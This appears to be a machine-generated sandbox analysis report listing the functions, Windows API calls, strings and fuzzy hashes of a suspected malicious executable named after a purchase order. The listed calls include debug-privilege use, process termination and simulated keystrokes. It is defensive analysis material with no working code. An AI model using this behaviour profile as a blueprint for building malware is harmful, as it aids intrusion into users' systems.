                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                    • String ID:
                                                                    • API String ID: 793581249-0
                                                                    • Opcode ID: 391aff3c73a9ade27ec92984c67aed06dd3f908af0e9982db7912447975ca680
                                                                    • Instruction ID: a920c7d70c417c241e3ebb956274dfb9d747d9332de474b482d90dc8a63a34d9
                                                                    • Opcode Fuzzy Hash: 391aff3c73a9ade27ec92984c67aed06dd3f908af0e9982db7912447975ca680
                                                                    • Instruction Fuzzy Hash: FD5151B20083859BC724EBA0D8819DFB3ECAF85350F00492EF699D3151EF75E689D766
                                                                    APIs
                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00C986FF
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                     • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: InvalidateRect
                                                                    • String ID:
                                                                    • API String ID: 634782764-0
                                                                    • Opcode ID: 007f31fb8ba62c74c5a493708a88bb613c7c4172a780238a7fe6aeb8180d3b13
                                                                    • Instruction ID: a22b11572af4400c54b53032f060f357014da11fe0f95dd9ca5330b92f49fb1c
                                                                    • Opcode Fuzzy Hash: 007f31fb8ba62c74c5a493708a88bb613c7c4172a780238a7fe6aeb8180d3b13
                                                                    • Instruction Fuzzy Hash: 96518130500244FEDF209B65CC8DFAD7BA5AB06760F604116FA61EB1E1CF71EA98DB54
                                                                    APIs
                                                                    • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00C4C2F7
                                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00C4C319
                                                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00C4C331
                                                                    • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00C4C34F
                                                                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00C4C370
                                                                    • DestroyIcon.USER32(00000000), ref: 00C4C37F
                                                                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00C4C39C
                                                                    • DestroyIcon.USER32(?), ref: 00C4C3AB
                                                                      • Part of subcall function 00C9A4AF: DeleteObject.GDI32(00000000), ref: 00C9A4E8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                     • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                    • String ID:
                                                                    • API String ID: 2819616528-0
                                                                    • Opcode ID: fa38725d135644b32638bab3004453bed50022d10a0b8b7090f2b67f1ac63fa5
                                                                    • Instruction ID: 63a5edead006c99a48be93fd3a4e8435794c35f2c990d039f8177e1b35e2954e
                                                                    • Opcode Fuzzy Hash: fa38725d135644b32638bab3004453bed50022d10a0b8b7090f2b67f1ac63fa5
                                                                    • Instruction Fuzzy Hash: 42516774A00209AFDB24DF65CC85FAE7BA5FB19310F104529F912D72A0D7B0EDA1EB90
                                                                    APIs
                                                                      • Part of subcall function 00C6A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C6A84C
                                                                      • Part of subcall function 00C6A82C: GetCurrentThreadId.KERNEL32 ref: 00C6A853
                                                                      • Part of subcall function 00C6A82C: AttachThreadInput.USER32(00000000,?,00C69683,?,00000001), ref: 00C6A85A
                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C6968E
                                                                    • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00C696AB
                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00C696AE
                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C696B7
                                                                    • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00C696D5
                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00C696D8
                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C696E1
                                                                    • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00C696F8
                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00C696FB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                     • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                    • String ID:
                                                                    • API String ID: 2014098862-0
                                                                    • Opcode ID: 3c37a90a801ca24ccc9d0dd4f45b8b4fd2e92584057790fbccc3d1588c588746
                                                                    • Instruction ID: f720ba76d77f656217f760b63142db45f969a56ec34eee8ef064b659c168c6d3
                                                                    • Opcode Fuzzy Hash: 3c37a90a801ca24ccc9d0dd4f45b8b4fd2e92584057790fbccc3d1588c588746
                                                                    • Instruction Fuzzy Hash: 57118EB1950618BEF6206B61DC8DF6E7A2DEB4C751F11042AF244AB0A1C9F26C529AE4
                                                                    APIs
                                                                    • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00C6853C,00000B00,?,?), ref: 00C6892A
                                                                    • HeapAlloc.KERNEL32(00000000,?,00C6853C,00000B00,?,?), ref: 00C68931
                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00C6853C,00000B00,?,?), ref: 00C68946
                                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,00C6853C,00000B00,?,?), ref: 00C6894E
                                                                    • DuplicateHandle.KERNEL32(00000000,?,00C6853C,00000B00,?,?), ref: 00C68951
                                                                    • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00C6853C,00000B00,?,?), ref: 00C68961
                                                                    • GetCurrentProcess.KERNEL32(00C6853C,00000000,?,00C6853C,00000B00,?,?), ref: 00C68969
                                                                    • DuplicateHandle.KERNEL32(00000000,?,00C6853C,00000B00,?,?), ref: 00C6896C
                                                                    • CreateThread.KERNEL32(00000000,00000000,00C68992,00000000,00000000,00000000), ref: 00C68986
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                    • String ID:
                                                                    • API String ID: 1957940570-0
                                                                    • Opcode ID: 906172d873b52033a0d703181485756b337e7ca51818cad5315ac70d945d62ac
                                                                    • Instruction ID: 6830be31c0d04a1e5f4f698ca0d5a44eae29cc5416253e662bdca98f6120db82
                                                                    • Opcode Fuzzy Hash: 906172d873b52033a0d703181485756b337e7ca51818cad5315ac70d945d62ac
                                                                    • Instruction Fuzzy Hash: 9701BBB5240308FFEB10ABA5DC4DF6F3BACEB89711F508426FA05DB1A1CA709801CB64
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: NULL Pointer assignment$Not an Object type
                                                                    • API String ID: 0-572801152
                                                                    • Opcode ID: d1015df09f1f703c2f44eb253d8d0bfec72186ac1bb1dbe9695f0714171cd6f9
                                                                    • Instruction ID: 4def5d12bc6b349c5e5a78e9411fb5f4655c250803dd4f096d86307f2a999d3e
                                                                    • Opcode Fuzzy Hash: d1015df09f1f703c2f44eb253d8d0bfec72186ac1bb1dbe9695f0714171cd6f9
                                                                    • Instruction Fuzzy Hash: 55C1A371A002199FDF10EF98D884BBEB7F5FB48318F188469E915E7280E771AE45CB94
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$ClearInit$_memset
                                                                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                    • API String ID: 2862541840-625585964
                                                                    • Opcode ID: 2cbc5fc16390dbe5e38784c12e90b53ad1e19ebc58d583ce4b883e84669f1ad0
                                                                    • Instruction ID: 5fcad8f2e6a539a6aafbd2ab5b08b6ac8ec52204cb406d72847a59e0b172a6e1
                                                                    • Opcode Fuzzy Hash: 2cbc5fc16390dbe5e38784c12e90b53ad1e19ebc58d583ce4b883e84669f1ad0
                                                                    • Instruction Fuzzy Hash: 5191BF71A00219ABDF20EFA5C848FAFB7B8EF45718F14811DF515AB290D7709A45CFA4
                                                                    APIs
                                                                      • Part of subcall function 00C6710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C67044,80070057,?,?,?,00C67455), ref: 00C67127
                                                                      • Part of subcall function 00C6710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C67044,80070057,?,?), ref: 00C67142
                                                                      • Part of subcall function 00C6710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C67044,80070057,?,?), ref: 00C67150
                                                                      • Part of subcall function 00C6710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C67044,80070057,?), ref: 00C67160
                                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00C89806
                                                                    • _memset.LIBCMT ref: 00C89813
                                                                    • _memset.LIBCMT ref: 00C89956
                                                                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00C89982
                                                                    • CoTaskMemFree.OLE32(?), ref: 00C8998D
                                                                    Strings
                                                                    • NULL Pointer assignment, xrefs: 00C899DB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                    • String ID: NULL Pointer assignment
                                                                    • API String ID: 1300414916-2785691316
                                                                    • Opcode ID: b64423779bb16b27246fb5e7fafc6149935436ba2482a811614a4b6d30dad124
                                                                    • Instruction ID: e283f0b4ae65ca5ca8902388a9a5f6132ab9cb10487b4979480b6e9ef31e5b87
                                                                    • Opcode Fuzzy Hash: b64423779bb16b27246fb5e7fafc6149935436ba2482a811614a4b6d30dad124
                                                                    • Instruction Fuzzy Hash: 63915971D00229EBDB10EFA5DC84EEEBBB9EF09314F10411AF419A7281DB719A45DFA0
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00C96E24
                                                                    • SendMessageW.USER32(?,00001036,00000000,?), ref: 00C96E38
                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00C96E52
                                                                    • _wcscat.LIBCMT ref: 00C96EAD
                                                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 00C96EC4
                                                                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00C96EF2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Window_wcscat
                                                                    • String ID: SysListView32
                                                                    • API String ID: 307300125-78025650
                                                                    • Opcode ID: 8e275625f248aa9f9fdf9fb7db613e7aea1655e44db3e24cc7b5540c055fb930
                                                                    • Instruction ID: 8c0a68de841b752239e52dc5b8a5f3fb40a0a7d5ba1db87c17ae3fc457474c98
                                                                    • Opcode Fuzzy Hash: 8e275625f248aa9f9fdf9fb7db613e7aea1655e44db3e24cc7b5540c055fb930
                                                                    • Instruction Fuzzy Hash: F041A171A00348ABDF219F64CC89BEE77F8EF08350F10042AF594E71D1D6719E858B60
                                                                    APIs
                                                                      • Part of subcall function 00C73C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00C73C7A
                                                                      • Part of subcall function 00C73C55: Process32FirstW.KERNEL32(00000000,?), ref: 00C73C88
                                                                      • Part of subcall function 00C73C55: CloseHandle.KERNEL32(00000000), ref: 00C73D52
                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C8E9A4
                                                                    • GetLastError.KERNEL32 ref: 00C8E9B7
                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C8E9E6
                                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 00C8EA63
                                                                    • GetLastError.KERNEL32(00000000), ref: 00C8EA6E
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00C8EAA3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                    • String ID: SeDebugPrivilege
                                                                    • API String ID: 2533919879-2896544425
                                                                    • Opcode ID: df67ad95767f63fe4f2d7dfb19c80b9eadf9da8ed5dff92fc598276a4edd079a
                                                                    • Instruction ID: 76eaab010390adab8b063e2d09c79454b2245d74a366a3a57ecdfef51493e97b
                                                                    • Opcode Fuzzy Hash: df67ad95767f63fe4f2d7dfb19c80b9eadf9da8ed5dff92fc598276a4edd079a
                                                                    • Instruction Fuzzy Hash: DB41CD31200200AFDB24EF24CCA6FAEBBA5BF41714F14841DF9069B2D2CB74E945EB95
                                                                    APIs
                                                                    • LoadIconW.USER32(00000000,00007F03), ref: 00C73033
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: IconLoad
                                                                    • String ID: blank$info$question$stop$warning
                                                                    • API String ID: 2457776203-404129466
                                                                    • Opcode ID: 68fd4215e15c6ceede2cae2977d47c9c8d8d748c70b77048b4a759991e78efb8
                                                                    • Instruction ID: 07f2233d92cb7ae3d358c5e3ebe4846cb5e2a6b899ea46439260cd84e7f5a591
                                                                    • Opcode Fuzzy Hash: 68fd4215e15c6ceede2cae2977d47c9c8d8d748c70b77048b4a759991e78efb8
                                                                    • Instruction Fuzzy Hash: 98113A313483C6BEEB249A95DC83EAF779CDF15360F20802EF908A6181DBB05F4476A0
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00C74312
                                                                    • LoadStringW.USER32(00000000), ref: 00C74319
                                                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00C7432F
                                                                    • LoadStringW.USER32(00000000), ref: 00C74336
                                                                    • _wprintf.LIBCMT ref: 00C7435C
                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00C7437A
                                                                    Strings
                                                                    • %s (%d) : ==> %s: %s %s, xrefs: 00C74357
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: HandleLoadModuleString$Message_wprintf
                                                                    • String ID: %s (%d) : ==> %s: %s %s
                                                                    • API String ID: 3648134473-3128320259
                                                                    • Opcode ID: 7b345bb96d21a6ce83ae02f3de9671829caf27125509824aa2573da5a328b68f
                                                                    • Instruction ID: 61eb342e70d170672b4b4fe05f074d439cf747c05a5c8b2b945028e70993c84b
                                                                    • Opcode Fuzzy Hash: 7b345bb96d21a6ce83ae02f3de9671829caf27125509824aa2573da5a328b68f
                                                                    • Instruction Fuzzy Hash: 81014FF2900208BFE71197A0DD8DFFA776CDB08301F0005AAB749E6051EA749E864B71
                                                                    APIs
                                                                      • Part of subcall function 00C12612: GetWindowLongW.USER32(?,000000EB), ref: 00C12623
                                                                    • GetSystemMetrics.USER32(0000000F), ref: 00C9D47C
                                                                    • GetSystemMetrics.USER32(0000000F), ref: 00C9D49C
                                                                    • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00C9D6D7
                                                                    • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00C9D6F5
                                                                    • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00C9D716
                                                                    • ShowWindow.USER32(00000003,00000000), ref: 00C9D735
                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00C9D75A
                                                                    • DefDlgProcW.USER32(?,00000005,?,?), ref: 00C9D77D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                    • String ID:
                                                                    • API String ID: 1211466189-0
                                                                    • Opcode ID: 3c0dc2d8b3fc7faa238d0c8ebe5de6f8c1168da4436e6ca3d9eaed1bb96f75bb
                                                                    • Instruction ID: ae76cc01a773fa6a272d38739abbde7abb43cb49a430391e17751df2162d7845
                                                                    • Opcode Fuzzy Hash: 3c0dc2d8b3fc7faa238d0c8ebe5de6f8c1168da4436e6ca3d9eaed1bb96f75bb
                                                                    • Instruction Fuzzy Hash: 11B18B75600215EBDF14CF69C9C97AD7BB1BF04701F09806AFC5AAB299D734AA90CB50
                                                                    APIs
                                                                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00C4C1C7,00000004,00000000,00000000,00000000), ref: 00C12ACF
                                                                    • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00C4C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00C12B17
                                                                    • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00C4C1C7,00000004,00000000,00000000,00000000), ref: 00C4C21A
                                                                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00C4C1C7,00000004,00000000,00000000,00000000), ref: 00C4C286
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: ShowWindow
                                                                    • String ID:
                                                                    • API String ID: 1268545403-0
                                                                    • Opcode ID: f8ea1bf13328b20a89c7ca2d1d3cf66bab2531a61a3253061f3a85315999c0dc
                                                                    • Instruction ID: 005a299851753a5cf2a580985d6b3ba21bdef15e8f1a855525b087cd837b5bd0
                                                                    • Opcode Fuzzy Hash: f8ea1bf13328b20a89c7ca2d1d3cf66bab2531a61a3253061f3a85315999c0dc
                                                                    • Instruction Fuzzy Hash: 4B41EA396097809BC7798B299CCCBEE7B95BF47310F14841EE05786571C6B1A9E1F720
                                                                    APIs
                                                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 00C770DD
                                                                      • Part of subcall function 00C30DB6: std::exception::exception.LIBCMT ref: 00C30DEC
                                                                      • Part of subcall function 00C30DB6: __CxxThrowException@8.LIBCMT ref: 00C30E01
                                                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00C77114
                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00C77130
                                                                    • _memmove.LIBCMT ref: 00C7717E
                                                                    • _memmove.LIBCMT ref: 00C7719B
                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00C771AA
                                                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00C771BF
                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00C771DE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                    • String ID:
                                                                    • API String ID: 256516436-0
                                                                    • Opcode ID: 9d6387d184946486b0af66b1591458f468b47db02bcb31d68a680f3b6052740c
                                                                    • Instruction ID: c8cb10215b02209d002426a765cc860266763f804a3cf0aebf770c81f6c96624
                                                                    • Opcode Fuzzy Hash: 9d6387d184946486b0af66b1591458f468b47db02bcb31d68a680f3b6052740c
